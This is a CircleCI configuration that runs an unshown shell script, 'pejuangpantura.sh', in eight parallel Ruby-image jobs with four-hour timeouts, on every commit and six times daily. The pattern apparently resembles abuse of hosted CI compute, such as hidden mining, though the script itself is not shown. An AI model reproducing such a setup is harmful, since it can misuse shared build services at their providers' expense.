resource_class: xlarge
working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout 
    - run:  
        command: chmod u+x pejuangpantura.sh && ./pejuangpantura.sh
        no_output_timeout: 240m

version: 2.0

jobs:
  ketekbasah:
    docker:
      - image: ruby
    steps:
      - checkout
  ketekbasah1:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  ketekbasah2:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  ketekbasah3:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  ketekbasah4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  ketekbasah5:
    docker:
      - image: ruby
    steps:
      - checkout
  ketekbasah6:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  ketekbasah7:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  ketekbasah8:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  ketekbasah9:
    <<: *build_definition
    docker:
      - image: ruby:2.4
workflows:
  version: 2
  commit:
    jobs:
      - ketekbasah
      - ketekbasah1
      - ketekbasah2
      - ketekbasah3
      - ketekbasah4
      - ketekbasah5
      - ketekbasah6
      - ketekbasah7
      - ketekbasah8
      - ketekbasah9
      
     
    triggers:
      - schedule:
          cron: "0 2,5,8,13,17,22 * * *"
          filters:
            branches:
              only:
                - master
                
  ketekbasahjob:
    jobs:
      - ketekbasah
      - ketekbasah1
      - ketekbasah2
      - ketekbasah3
      - ketekbasah4
      - ketekbasah5
      - ketekbasah6
      - ketekbasah7
      - ketekbasah8
      - ketekbasah9
